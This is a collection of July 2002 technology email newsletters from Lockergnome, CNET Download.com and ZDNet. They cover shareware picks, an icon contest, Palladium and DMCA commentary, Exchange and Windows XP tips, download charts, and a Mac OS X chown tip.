Â  07.10.2002 GnomeREPORT WE NEED YOU TO BE AT GNOMEDEX! That's what your employer should be telling you. Microsoft Pocket PC experts will be sharing tips on improving workplace productivity with portable devices. Combined with Proxim's on location wireless networking solutions, the Pocket PC can keep you and your co-workers communicating no matter where you are in the building. Learn how to bring Wi-FI and PDA technologies together for the ultimate in portable computing. Register for Gnomedex today!Last week, Axialis Software
released IconWorkshop v5.0 - arguably the most powerful icon
editor / manager for the Windows platform. Ever the icon addict, I
asked for your pixel-perfect creations. I have yet to receive one.
Perhaps you've been waiting for the right motivation? How about a
nice little contest involving some of the most powerful sites on
the Internet? Here's the deal: you create five (or more) icons
between now and the end of July 2002, upload them to your [FREE]
DeviantArt account (under Contests / Axialis Icon Contest), and
one of the five judges may pick it. The panel includes: myself,
MattEO from DeviantArt,
KarmaGirl from WinCustomize, Voodoo from
Neowin, and Marc from
Axialis. We'll each pick our favorite set. The winners will not
only receive one copy of IconWorkshop Corporate Edition, but some
of their icons will get bundled with a future version of the
software! Ownership is retained by the original author, so don't
hold back. Here's your chance at fame and fortune. Or, at least
fame and free software.Ah, the life of a software junkie! Pieter just released the new
(unofficial) Google SearchTool
today. It's much more convenient than the official toolbar (sorry,
I just don't like browser add-ons). I also gave
Cacheman
another go; I haven't used it since Windows 98. It's always been a
great piece of shareware, but I didn't realize it was THIS good.
The speed increase has been quite noticeable (even on Storm Shadow,
my P4 2.5GHz machine). Outer Technologies is brilliant. And so is
Repligator 9.0. It gives
me access to instant special effects - a one-stop shop for digital
photo fun. I'm still debating whether or not to install the latest
Java runtimes. It seems to be unobtrusive on my test machine,
which is good to see; I don't want browser integration, I just
wanna run that awesome ASCII Art program. Oh, and "12 Mistakes
Executives Make When Planning Web Strategy" is available for FREE
with the purchase of ANY GnomeTome (including our 50
freshly-released OS X tips). Go grab it if your boss doesn't know
as much as s/he should.There's a little bit of Oingo Boingo on Emusic now. They inked a
deal with Universal Music Group today - and I'm not paying any
more to get access to even more MP3s. This is the ONLY
way to go, and I hope and pray that more record labels will
eventually catch on to the craze. The Internet is more than a
place for a pseudo-interactive pamphlet; the Internet fosters
knowledge; the Internet is still in its infancy; the Internet has
encouraged creativity and commerce. The one thing the Internet is
NOT: a fad. Its potential is limitless, as long as it remains
flexible and not controlled by any one company. This
Palladium
thing has got me more than a little spooked. It, combined with the
service-oriented OS, could very well be the thing that drives
people away from the Windows platform in droves (as much as I hate
to admit it). Software and music pirates unwittingly created DRM.
I best not find out that you're part of the problem.
See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeDOWNLOADS
Groone's Recipe Holder v1.1.0 [8.2M] W9x/2k/XP FREEhttp://www.groonesworld.com/rholder.htm{Recipe lister} The best thing about this recipe holder? The
conversion calculator. I've always wondered how many teaspoons
were in a gallon. There are a few delicious recipes already
included, to help you start your collection of favorites.
Everything is nicely divided into categories, too. Need a salad?
Then click "Soups &amp; Salads." (Easy!) You can also make shopping
lists. The printing capability is nice too, since I'm assuming
most of you don't keep your computer next to the stove. "If you
have an up-to-date computer with Win2000, XP, or 98SE with the
latest version of IE, then you can download the version with no
runtime support since your computer has all the necessary files."
SolarInfo v1.0 [1.1M] FREEhttp://www.sulaco.co.za/downloads.htm{Sun, moon, and planets} Why is it all the other planets have
really cool names for their respective moon(s), but Earth's is
simply referred to as "moon?" We should change it to something
catchier, like "Joey Joe-Joe Junior Shabbadu." Don't mind me, I
was just looking at this new application. It shows a graphical
representation of every planet in our solar system (as opposed to
every planet in the Hoth system) and its moons. It also provides
detailed information such as the planet's distance from the sun,
its volume, mass, and gravity in relation to Earth. What I found
most interesting was how long a single "day" lasts on different
planets. Did you know one day on Pluto is equal to six days on
Earth? I guess he chased Chip and Dale around the Christmas tree
for longer than we thought.
Recommend It!
Â GnomeCLICKS
Â GnomeSYSTEM
TightVNC v1.2.4 [660k] W9x/2k/XP FREEhttp://www.tightvnc.com/"VNC (an abbreviation for Virtual Network Computing) is a great
client / server software package allowing remote network access to
graphical desktops. With VNC, you may allow yourself to access
your machine from everywhere provided that your machine is
connected to the Internet. VNC is free (released under the GNU
General Public License) and it's available on most platforms. The
original VNC distribution can be obtained at the AT&amp;T research
labs site. Here you can find enhanced version of VNC, called
TightVNC (grown from the VNC Tight Encoder project), which is
optimized to work over slow network connections such as low-speed
modem links. While original VNC may be very slow when your
connection is not fast enough, with TightVNC you can work remotely
almost in real time in most environments. Besides bandwidth
optimizations, TightVNC also includes many other improvements,
optimizations and bug fixes over VNC."Recommend It!
Â GnomeWILDCARDFull PDF Books
Poor Richard's Web
Internet Promotions
E-Mail Publishing
Web Site Makeover
Websites Made Easy
Online Communities
Home Networking
Internet Recruiting
Online BrandingPop-Up Menu Navigation Software
Scribbled by Pat Wonghttp://popup.jscentral.com/I found some really cool software to generate Web site navigation
menus, and I thought you might be interested in learning about it.
There are several examples on the company's site, as well as on my
own. Here's a small write-up about it; perhaps you'd be interested
in running this in a future Lockergnome issue? We've all seen a
lot of really cool site navigation menus, with pop-up text, neat
mouseover effects, and the like. Most of them require a
combination of HTML and JavaScript to build, which is expertise
that goes way beyond some of us. At last, it's possible to easily
generate just such a menu with some very user-friendly screens to
enter the data you want to use.Pop-Up Menu comes in a freeware version, or you can get a fully
licensed version ($34.95 for a Home User license / $129.95 for the
Web Designer license). The biggest difference? With the licensed
version, you get the ability to save a menu you've generated so
you can modify it later. Your only alternative, if you want to
make even a simple change to a menu generated by the freeware
version, is to create the whole menu again from scratch (or diving
into the nuts and bolts of the code and modifying that). Be
forewarned: The JavaScript reads like a novel, so modifying that
could potentially be a nightmare. I decided to buy the fully
licensed version and I'm really glad I did. Sorry if I sound like
a commercial for the company; I don't work for them or stand to be
compensated in any way for recommending them. I just think this
menu system is the greatest thing to come along in a while.
Submit Your Thoughts | Recommend It!Avoid intruders in your online space: Our choice to protect your privacy! Complete browsing security. Clear cache, cookies, history and more with the click of your mouse. Leave no telltale tracks behind!" Get a virtual Panic Button for your PC! Try it today!Â GnomeFAVORITE
Calculator
Unearthed by a Gnomiehttp://www.calculator.com/{Calculate it} Calculators aren't just for adding and subtracting
numbers or spelling silly phrases by turning the calculator upside
down. How about figuring out the financing on your new car? What
about the seeding rates for your wheat farm? Perhaps you
programmers out there need a nice HEX calculator. And, of course,
what football fan wouldn't like to calculate the passing rates for
his or her favorite quarterback? If it seems like I'm all over the
map here, it's because this site provides links to all kinds of
calculator sites for all kinds of people. Trust me: it all adds up
to a unique and useful site.Recommend It!
Â GnomeTIPOur Tip eBooks
Microsoft Office Tips
PC Productivity Tips
Cool Internet Tips
Windows 2000 Tips
Windows XP Tips
Top 50 Fun Sites
Must-Know Terms
Top 50 Useful Sites
Top 75 Tech SitesWho knows how to thwart false charges? Lockergnomie Steve
Lafferty: "In a recent article over the PayPal issue, it was
stated that when using a credit card illegally, the owner of that
card is responsible for the first $50.  However, sometging that
very few people know about is that there is a US Federal provision
in the banking industry called 'Reg E' (Regulation E / Electronic
Funds Transfer). This stipulates that all transactions will err in
favor of the customer (account holder). This means that if your
'bank card' is used without your permission, you are not
responsible for any of the charges. My suggestion is never to use
a credit card - and only use your bank debit card. That way, if
someone steals your number, you are not liable for any of the
charges." For more information, please refer to Section 205 on
FEDERALRESERVE.GOV. Obviously, this tip only applies to people
living in the USA. If you haven't been watching your statements
like a hawk lately, you'd be wise to start soon. Identity theft is
a growing concern. When my wallet was stolen, I found
IDENTITYTHEFT.ORG to be a godsend.Recommend It!http://www.lockergnome.com/issues/daily/20020710.html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
Â Latest Audio ShowÂ Low Price Search
Â $99 Tech ConferenceÂ The GnomeSTORE
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BookÂ General Feedback
Â E-mail the Editor
Â The Editor's Blog
Â MP3 SOFTWARE
Havas MP3 Pro
Magix MP3 Maker
Ejay MP3
Audiostation 5.0
Jack The MP3 Ripper
Pearson MP3 Maker
Steinberg My MP3
MusicMatch Jukebox 7.0
Hip Hop E-jay Record
MP3-Wolf
MP3 Maker Gold
The MP3 Wizard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the story of the ugly shoe unfold before our very eyes. This footwear was outcast from the group weeks ago, and has been very depressed ever since. Pity my shoe.The Lone Shoe
Â 
CLICK HERE TO ZOOMÂ 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.Exercise extends your life by ten years, but you spend 15 of them doing it.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Download Dispatch - PC Edition
Downloads
  All
CNET
  The
Web
In Utilities:
ESftp 4.1
In Home &amp; Desktop:
CursorXP 1.2
In Audio:
Acoustica CD Label Maker 1.13
DJ 2000 1.6
In Internet:
ICQ 2002a Build #3728
In Multimedia:
AI Picture Utility 6.2.1
PhotoJam 3.0
In Web Authoring:
Webserver Stress Tool 5.32
In Games:
David's Backgammon 4.6.1
Want to search for updates automatically? Click here to try out CNET CatchUp,
a free service that scans your system and points you to the latest software updates.Most Popular Upgrades:Â 1.
ZoneAlarm Pro 3.0Â 2.
Norton AntiVirus 2002Â 3.
AdSubtract Pro 2.5Â 4.
Microsoft Windows XP - ProfessionalÂ 5.
Nero Burning ROM 5.5Â 6.
Reason 2.0Â 7.
Microsoft Windows XP - Home EditionÂ 8.
QuickBooks Pro 2002 Â 9.
Adobe Photoshop 7.010.
WinZip 8.1
Find a
                   complete list of the 50 most popular software products at
                   CNET
Shopper.com.
Summer 2002 software
Test your bandwidth
New jobs, click here!
Inside HP 
Bluetooth: speeds up
July 9, 2002
Browse or bustThrough daily use I've found that Mozilla and Opera Web browsers beat Internet Explorer because of two features: tabbed windows and built-in pop-up killers. But occasionally I hit a site that has features that don't work or has a messed up layout, so I have to launch IE to view it correctly. In the last couple of years, Web builders have used proprietary code from Microsoft in their sites, which Mozilla and Opera don't support.I used to cover Web building, so I have plenty of insight into the problem. Using current, standard HTML and JavaScript, Web builders can make a Web site do almost anything that you could with Microsoft's proprietary code. The only things they can't do are goofy enhancements such as changing the browser scroll bar colors. To solve this compatibility problem, either Web builders have to take proprietary tags out of their sites or users have to use IE to view them. You can also enhance IE with utilities such as Secure IE to get the kinds of features offered by Mozilla and Opera, giving you the best of both worlds.Who do you think should be solving problems of Web site incompatibility: Web builders, users, or browser manufacturers? Let me know at edit@download.com.Wayne Cunningham
Features Editor, CNET Download.com
Is your ISP safe from hack attacks?
Surely, the folks who run your ISP have thought long and
    hard about security issues, but should you count on them to
    ward off intruders? Not wise, says our ISP expert. In this
    week's column, Dan Tynan takes security matters into his own
    hands and shows you how to protect yourself.
Two apps that bring the iPod to the PC
That's right, Windows users. If you've been drooling over
    Apple's lovely little MP3 player, you're in luck. Not one
    but two software apps bring iPod compatibility to your
    FireWire-equipped PC. EphPod and XPlay square off in this
    battle of cross-platform compatibility.New products from our
sponsors Say the Time
Say the Time is the newest evolution of the cuckoo clock.
    Hear the time, set multiple alarms, customize the look of
    your taskbar clock, sync your PC with an atomic clock
    server, and more. Try it free.
 Ashampoo WinOptimizer Suite
Find redundant files, clean up
    your Registry, recover space on your hard disks, and
    optimize Windows performance.
All Download Launchpad
titles powered by Download Express--CNET's new speedy download
service!
As KaZaA continues to maintain its stranglehold on
    No.1, BearShare continues its climb up the list to No. 6 .
 Most Popular TitlesWeek ending July 9 Last  Week 
 Weeks  on Chart 
 Downloads  This
                   Week 1.KaZaA
Media Desktop1
10
1,839,092
2.Morpheus2
62
742,235
3.ICQ
2002a3
250
445,174
4.WinZip4
299
362,230
5.iMesh5
115
305,699
6.BearShare7
73
214,030
7.Ad-aware6
43
140,849
8.Download Accelerator8
134
136,510
9.Qtraxmax18
3
134,426
10.CNET CatchUp12
114
82,420
           Here are some of the
fastest-rising downloads on our Most Popular list.
Top Movers
The Rundown 1.
Nero Burning ROMThis CD recording software is one of
       the top sellers at Shopper.com and clearly it's also
       popular at Downloads as it moves up 5 spots to No. 23.2.
DocCommanderEnhancing the Open and Save pop-ups in
       Windows seems to be on users' wish lists as this utility
       moves up 7 spots to No. 29.
       3.
SWiSHAdding Flash animations to your Web site is always
       a good eye-catcher, so it's no surprise that this app has
       started to rise, moving up 7 spots to No. 31.4.
Grand Theft Auto 2The latest update for this game spurs
       even more interest in an already wildly popular series,
       moving up 9 spots to No. 33.5.
IncrediMail XeThis customizable e-mailer continues to
       be popular with its personal look and makes a showing
       on the list at No. 40.           Want more? See our Top 50
downloads.
           In Audio
Quintessential Player 3.4
        License: FreeFile size:
      2.48MBMinimum requirements: Windows 95/98/Me/NT/2000/XP
      Tailor your PC music experience with this skinnable audio
    player that offers a vast array of plug-ins. Use the basic
    player in the background while you work on other apps, or
    perform a variety of operations from CD burning to playlist
    organizing or even processing with DSP effects.Want to review Quintessential Player? Submit your opinion here.
In Utilities
RAM Idle Professional 2.0
 License: Free to try; $19.95 to buyFile size:
1.18MBMinimum requirements: Windows 95/98/Me/NT/2000/XP
Does your computer suffer from long lag times when you open
    programs or load Web pages, choppy multimedia
    playback, crashes, or other symptoms of memory loss? Recover
    system memory and optimize your cache with this cure
    for computer amnesia.      Want to review RAM Idle Professional? Submit your opinion here.
In Home &amp; Desktop
Enterprise Theme 2.0
FreeFile size:
1.71MBMinimum requirements: Windows 98"Star Trek" fans have another reason to wear pointy ears and
    learn Klingon. The latest iteration of the "Star Trek"
    franchise takes us back to the origins of Federation space
    exploration, in a time before Kirk or Picard. Now you can
    teleport your desktop there as well with this theme
    featuring sounds, icons, wallpapers, and more from the
    newest "Star Trek" show, "Enterprise."      Want to review Enterprise Theme? Submit your opinion here.
In Games
Magic: The Gathering Online 1.0
FreeFile size:
309MBThe popular trading card game has gone online. Featuring
    hundreds of cards and an Internet full of opponents, plus
    tournaments and leagues, the action can continue
    indefinitely. And future expansion packs ensure that the
    level of gameplay stays fresh.      Want to review Magic: The Gathering? Submit your opinion here.
In Web Authoring
CoffeeCup HTML Editor 9.3
Free to try; $49 to buyFile size:
6.81MBMinimum requirements: Windows 95/98/NT/2000/XPBrew up a Web site that will have your users asking for a
    second cup with this full-featured, easy-to-use HTML editor.
    This program comes packed with prebuilt graphics, icons,
    photos, and JavaScript templates. You'll also find a frame
    designer, a table designer, a font designer, a built-in FTP
    client, and multipage support. Version 9.3 includes
    additional JavaScript templates, a built-in Flash text
    wizard, and right-click FTP functionality.      Want to review CoffeeCup HTML Editor? Submit your opinion here.Last week I asked whether Audiogalaxy could survive only offering non-infringing files. Here are a few of your answers:
"Doomed. Completely, absolutely, utterly!"
Just about everyone agreed that Audiogalaxy is as dead as Napster."Each time a file-sharing service is canceled, a bunch of new ones appear."
But some people always find a silver lining."I might use a file-sharing service for a lot of things, particularly drivers, fixes, and patches."
A P2P network offering drivers seems like a great idea to me."I was an occasional Audiogalaxy participant (birthday CD burned to include songs that were hits the year you were born). Now I'll just opt for a birthday card and a bottle of wine."
I included this comment because I really like the birthday idea."It seems once again rather than release a file download site for music, at a fee per download, the music companies spend money on trying to stop download sites like Audiogalaxy."
With its popularity, file swapping should be an amazing opportunity for record companies, but they must not be smart enough to figure out how to make it work.
The e-mail address for your subscription isÂ 
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
Â AdvertisePrice comparisons |
Product reviews |
Tech news |
Downloads |
All CNET services        Copyright 2002 CNET Networks, Inc. All rights reserved.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</si>
  <si>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20020710 Lockergnome Tech Specialist
Â  07.10.2002 GnomeREPORT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Reader Jack Macdonald has some advice for you would-be bards in the audience: "You mention Karaoke being featured at Gnomedex and you 
might want to point out to other Gnomies that they could 
practice their Karaoke on my Red Hot 
Karaoke Page site. There are the words and music for 
more than 1100 songs available on the site and by 
downloading the Yamanha Midiplug (a link is provided) they 
can even change the key of the song to suit their voice 
range as well as speed up or slow down the music to their 
taste. In other words, to have the same experience as they 
would have with professional Karaoke equipment but at no 
extra cost! At this price (zero) a lot of gnomies going to 
Gnomedex could be singing up a storm by being properly 
prepared for your Karaoke."Travel day on Wednesday as I head down to Ankeny, Iowa to 
help out a former co-worker and avid Gnomie with some server 
and networking stuff. The tough part is remembering 
everything I'll need. It never fails, though. I always, 
always, always forget something. I can make lists two weeks 
in advance and I'll end up 30 miles down the road with a 
handprint on my forehead when I come to the realization that 
I left something important behind. What will it be this 
time, I wonder? I'll let you know on Thursday.
See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Randy NielandÂ Â Â Â Â Â Â Â GnomeNETWORK
Forwarding to Internet Address Fails
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q181636
Client inquires about the possibility of forwarding all 
internal and Internet email to his AOL mailbox when he's out 
of the office, and I figure it's going to be a piece of 
cake. He recently acquired a new phone through Verizon along 
with web access and a tie into his AOL mailbox, which was 
the driving force behind this request. What I found was that 
Internet email proved to be easy using a simple forwarding 
rule, but none of the internal Exchange email was being sent 
out to the Internet upon receipt, even though it appeared to 
be included in the rule. As it happens, this is due to a 
default configuration option on the Exchange 5.5 server that 
prevents automatic replies/forwards from being sent to the 
Internet using the Exchange Internet Mail Service. A quick 
configuration change and restart of IMS will put things 
right.
Â GnomeSYSTEM
Stop the Presses
http://www.wininformant.com/Articles/Index.cfm?ArticleID=25802
... The CD presses, that is. Microsoft has given in to 
the greater good and delayed Windows 2000 Service Pack 3 
indefinitely. Sure, it's mildly disappointing, but I applaud 
the move. Instead of trying to downplay the previously 
identified problems with Microsoft Installer (MSI) 2.0, the 
service pack will be put on ice until the issues are 
straightened out. Here's a quote for you... Good job, 
Microsoft.
Â GnomeALERTZ
Today's Top 5 kbAlertzQ198845 - WD2000: How to Return Only File Names Using FileSearch Property (Q198845)
Q310436 - Cannot Play a DVD in Windows XP (Q310436)
Q321305 - How to Log On to Windows XP If You Forget Your Password or Your Password Expires (Q321305)
Q321146 - Freddi Fish 2: The Case of the Haunted Schoolhouse Program Causes an Error Message in Windows XP (Q321146)
Q321144 - Visioneer One Touch 8100 Scanner Causes an Error Message in Windows XP (Q321144)CHRIS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Recommend It!
Â GnomeASSISTANT
Windows XP System File Checker
Dean Truax mentioned the System File Checker as a 
possible solution to my Windows Media Player problem under 
Windows XP, and I did indeed run through it prior to 
attempting an in-place upgrade, obviously with no 
improvement. It's still worth a mention, however, in case 
you're not familiar with what it's there for. As you're 
probably aware, XP contains a file protection scheme that 
will immediate replace any system files that are deleted or 
altered in any way, ensuring that XP is kept in a stable 
state. Sometimes this system can get a little out of whack, 
and the SFC is meant to restore order. Note that any 
hotfixes and other Microsoft-provided updates will be left 
in place since they properly update the DLL Cache that is 
used as the sanity check to determine if a system file has 
been messed with. To access the SFC, simply launch a command 
prompt and type "SFC" to display a list of options.
Â GnomeSTUFF
Consider This
Forwarded by JWhttp://www.computerworld.com/securitytopics/security/story/0,10801,72519,00.html
The next time you have a face-to-face with your elected 
representatives, you might want to start asking about their 
opinions on technology laws that are being proposed left and 
right. Holding a public office seems to be introducing brain 
death more frequently considering proposals by Senator Fritz 
Hollings and now LA congressman Howard Berman. If Mr. Berman 
gets his way, companies may very well be allowed to hack 
into your systems without proof of provocation in order to 
ensure that you are using their software according to the 
stated rules. Mind you, if they cause colateral damage or 
upset other systems, there isn't thing one you can do in 
return. Nope, they'll have legal protection. This garbage is 
seriously getting scary. If you think it won't be abused, 
consider the case of Dimitry Skylarov when he publicly 
pointed out eBook security problems with Adobe's software 
and was promptly thrown in jail for his trouble under the 
authority of the Digital Millenium Copyright Act. He was 
eventually released, but that doesn't make it any more 
right.
Recommend It!http://www.lockergnome.com/issues/techspecialist/20020710.html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</si>
  <si>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
ZDNet AnchorDesk Daily NewsletterVeritas CEO Gary Bloom speaks out at Tech Update. 
Check out these personal laser printer picks at ZDNet Reviews. 
See how WAP works and how you should use it at Builder.com. 
Need a new job? Find one today in ZDNet's Career Center. 
CIOs talk out about the future of IT at CNET News.com. WED JUL 10, 2002Â David CourseyMS's Palladium: What the hell is it? (Here's what!)
                Everybody's talking about Palladium, Microsoft's new "trustworthy computing" architecture. But the details on what it is and how it will work are still extremely sketchy. Here's what I've been able to piece together so far.
NOTE: Why we're changing our publishing schedule 
PLUS: AnchorDesk Radio: Kicked out of Macworld WiFi nets: Stop sharing!... iPod for Linux... Super-sized notebooks 
Why cyberterrorists don't care about your PC
Guilty pleasures: 3 top politically incorrect games  Crucial Clicks: More from ZDNet           PDAS    An industry firstZDNet reviewers take a look at Toshiba's e740, the first PDA with Intel's new XScale processor and integrated WiFi connectivity.  Read our Full Review      yMost Popular Products    Handhelds 1. Toshiba Pocket PC e310 2. Toshiba Pocket PC e740 3. Palm m515 4. Palm Vx 5. Compaq iPaq H3835 More popular PDAs             Â SYLVIA CARRÂ WiFi nets: Stop sharing!... iPod for Linux... Super-sized notebooksCable companies are demanding that customers stop sharing their high-speed Net access over wireless networks. Plus: Linux users may soon be able to access Apple's iPod. And Toshiba unveils a fashionably large notebook. Â ROBERT VAMOSIÂ 
Why cyberterrorists don't care about your PC
                Forget about viruses. America's real cybersecurity concerns are the notoriously vulnerable computer systems that control our power and water supplies. But Robert has a few ideas about how to keep the infrastructure safe.
Â PRESTON GRALLAÂ 
Guilty pleasures: 3 top politically incorrect games
                Sometimes you just want to kick back and drive drunk, commit a few crimes, or blast some innocent critters to smithereens. Preston's got three raucous downloads that let you do all that and more--from the safety of your PC.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</si>
  <si>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Tech Update Today
VITAL SIGNS FOR JULY 10, 2002David Berlind
What to look for in your next smart phone
With PDAs and cell phones on the fast path to convergence, choosing the right 
device is harder than ever. Before you buy one more handheld, see my prescription 
for mobile happiness.Reader: Kyocera is stepping stone to the perfect smart phoneLatest from ZDNet News
Microsoft eyes Visa users with Passport
No jitters here: IBM drives tap new tech
Telecom firm leaks student data to Web
Israel, Hong Kong hotbed for cyberattacks
Microsoft puts content software to the test
Micron: PC demand to boost chip sales
Flash! Macromedia tools speak up
Will Dell delve into printers?
More Enterprise NewsFarber's PicksDanFarberTackling tough issues in e-customer serviceIdentity services let e-commerce sites better serve customers and secure their 
transactions. Both Passport and the Liberty Alliance offer merchants 
some ability to recognize customers. Check out this overview of today's identity 
services--and find out why PKI is not dead yet. 
Read the full story
Toshiba releases monster notebook
Weighing in at 9.6 pounds, the new Toshiba Satellite 1955-S801 notebook 
has a 2.2GHz Pentium 4 desktop processor and a huge 16-inch display. The 
desktop-replacement notebook category also includes the Satellite 1905 
that Toshiba introduced last month, as well as products from Hewlett-Packard. 
Gateway and Dell may be looking at the concept too.  The Satellite 1955 will 
cost $2,499 and sports a few features not found in other desktop-replacement 
notebooks, including a detachable wireless keyboard and wireless mouse. 
Read the full storyClone, clone, clone your disksImaging software can help you roll out new systems faster, right? The catch is that fine print requirement for "identical client hardware." But Tech Update's Lee Schlesinger says new technology from IBM may be a quantum leap for disk imaging. Read his full commentaryTech gets set for China breakthroughIt's one of the few words that can perk up a high-technology executive these 
days: China. Companies have attempted to tap the country's enormous potential 
for years, but it has become a far more attractive target recently as 
the rest of the world remains mired in economic problems. Now, the People's 
Republic of China has become one of the leading strategic opportunities for 
Intel, Nokia, Hewlett-Packard and virtually every other multinational. 
Read part one of this special report
Poll: What will be the primary role of TabletPC?
Tech Update readers see no shortage of applications for Microsoft's TabletPC. 
Some of you want one, many of you say you need one. But what will be the primary role 
of TabletPC: Vertical applications? A notebook/desktop replacement? Home use? 
Or will it meet the same fate as previous tablet attempts? Take our Quick Poll
Write me at dan.farber@cnet.com
Back to topAlso on Tech Update Today
Q&amp;AÂ Caldera VP bullish on UnitedLinux
In part two of a Tech Update interview, Benoy Tamang, Caldera VP of 
strategic development, discusses UnitedLinux's strategy regarding additional 
members and competition in the enterprise Linux space. 
 FEATUREÂ Putting Web services to work
Want to get your feet wet integrating Web services? Find out how to integrate Web services on a small scale and how particular platforms can simplify your efforts.
 PREVIOUSLY ON TECH UPDATE TODAYÂ Should all storage be encrypted?
Start-up NeoScale claims that its new storage encryption appliance 
can secure any or all data bound for Fibre Channel-based storage--with no impact on performance.Crucial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ZDNetVeritas CEO Gary Bloom speaks out at Tech Update.  Check out these personal laser printer picks at ZDNet Reviews.  See how WAP works and how you should use it at Builder.com.  Need a new job? Find one today in ZDNet's Career Center.  CIOs talk out about the future of IT at CNET News.com.
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</si>
  <si>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color: #14367A }
 a:link    { COLOR: #2E64DC; TEXT-DECORATION: underline; font-weight: normal }
 a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
 a:active  { COLOR: GRAY; text-decoration: none }
 a:hover   { color: GRAY; TEXT-DECORATION: none }
 p.title   { BACKGROUND: #2E64DC; BORDER-BOTTOM: #14367A 4px solid; BORDER-LEFT: #94B2EE 4px solid; BORDER-RIGHT: #14367A 4px solid; BORDER-TOP: #94B2EE 4px solid; COLOR: #FFFFFF; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
 p.sidebar { BACKGROUND: #94B2EE; BORDER-BOTTOM: #2E64DC 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #2E64DC 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #14367A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
 .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
--&gt;
20020709 Lockergnome Apple Core
Â  07.09.2002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I've finally done it! Lockrgnome's Top 50 
Mac OS X Tips is in publication 
and available for purchase at GnomeTomes.com. Less than half the tips have 
appeared in the Apple Core newsletter already, so purchasing them means 
getting mostly brand new content. This represents the first thing I've 
written that people might actually pay to read, so if we sell one copy, 
I'll be ecstatic. And hopefully, any of you who check out the tips will 
find them useful. I know that figuring out how to do each of the 50 things 
on the list has improved my personal OS X experience.Although this newsletter started out with Chris, Randy, and I writing 
sections of the newsletter, time constraints have limited the 
contributions of the other two guys. This does not mean either of them is 
truly less involved, it just means I'm doing more writing. Both Chris and 
Randy regularly send me links to cool Mac stuff they find, much of which 
will ultimately end up in upcoming issues. Since the writing will be 
primarily mine, I've opted to eliminate the "Review by" links at the bottom 
of each article. Unless otherwise noted, you can safely assume I wrote it. 
If you need to send me an e-mail, the E-mail The Editors Link in the 
sidebar will reach me, as well as putting your message in front of Chris 
and Randy.I've been doing some exploring of AppleScript over the past several months 
and believe I'm finally confidant enough in writing scripts that I'm going 
to add a section on scripting to the newsletter. I'm curious to know what 
your level of experience with scripting is, because I can either start with 
some really basic stuff, or skip the basics and dive into meatier scripting 
topics. Either way, I'm open to some 
AppleScript suggestions.See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Jake LudingtonÂ Â Â Â Â Â Â 
For Mac Outlook users:
OS X Tips - http://www.gnometomes.com/tome/cat_macintosh.htmlÂ GnomeDOWNLOADS
Sherlock Plugins v2.2 [600k] Mac OS 9/OSX FREE
http://www.searchstandard.com/
While doing some research for my top 50 tips, I discovered that turning 
off some of Sherlock's extras, like multi-language indexing, in the 
preferences will speed things up considerably, particularly for local 
machine searches. This renewed my interest in finding ways to add-on 
search capabilities to the bundled sleuth, resulting in my discovery of 
SearchStandard.com. This bundled collection of search plug-ins makes it 
possible to look for almost anything using Sherlock. Their Web site 
won't wow you, but SearchStandard's free plugins most certainly make 
finding things online, including searches on your favorite Mac sites, 
that much easier.
Â GnomeNETWORK
Xnet v1.0.6 [216k] OSX $48
http://bitcom.ch/products-xnet-e.htmlDealing with servers that offer mission critical services, like 
intranet access, e-mail, or Web serving, means dealing with those 
services failing from time to time. Don't be left in the dark 
when one of your services go down, let Xnet keep you informed. 
The unregistered version of the product lets you verify http, 
ping, smtp, and ftp service availability, with many more service 
verifications included in the pro version. Xnet runs on your 
local machine, verifying remote service availability and sending 
you a message when those services go down. The interface allows 
for user-defined services, with alert features for both an e-mail 
account (mine alerts are going to my cell phone) and locally via 
a sound from your machine.
Â GnomeTERMINALFor OS X installs with multiple users, there may come a time when you 
need to change ownership of a particular file. This is particularly 
useful in situations where one user created a file, but an entirely 
different user is the only one who will ever make future decisions 
relating to that file, like whether to keep it or throw it in the 
Trash. chown is the Terminal command designed to handle this. From 
the command line type:sudo chown username filenameYou'll of course want to substitute the username of the new owner for 
username. The name of the file receiving a change of ownership will 
replace filename.
50 LINUX TIPS: From the mind behind the Penguin Shell come two 
more eBooks in the GnomeTome series. Whether you are a Linux newbie 
or command line guru, you'll want these tips as part of your 
information arsenal. 
Get your copy 
of Tony's Top 50 PenguinTWEAKS or Top 50 PenguinCORE tips today!    
Â GnomeFAVORITE
Susan Kare
http://www.kare.comAs we move further into the future of Apple's Mac OS evolution, it 
remains important to understand where things evolved from. Susan 
Kare designed all the original icons for the Mac OS, way back in 
1983. In fact, that smiling Mac that appears as OS X boots is her 
creation. Check out her collection of UI artwork, from both Windows 
and Mac operating systems. Also available from Kare.com are Kare 
designed icon apparel and collections of fonts as designed by Susan.
Â GnomeTIPShow Info gives you access to change the application associated with a 
particular file type, rename files, and reassign permissions. One of 
the best features of Show Info is it's ability to store "comments" 
related to a file or application. This can be a great place to store 
information on recently made changes to a file, information from others 
who've looked at a file, or in the case of applications, serial numbers 
and other pertinent data you may need when dealing with tech support.http://www.lockergnome.com/issues/applecore/20020709.html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
Â Top 50 Fun Sites
Â Must-Know Tech Terms
Â Top 50 Useful Sites
Â Top 75 Tech Sites
Â Top 50 PenguinCORE
Â Top 50 PenguinTWEAKSÂ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BookÂ General Feedback
Â E-mail the Editors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</si>
  <si>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
CNET Handhelds Newsletter
Downloads
 All CNET
 The Web
Â  
Top-selling handhelds:Toshiba Pocket PC e310
Palm m515
Handspring Treo 90
Compaq iPaq H3835
Palm Vx
Handspring Treo 270
Sony CLIE PEG-NR70V
Sony CLIE PEG-T615C
Palm m130
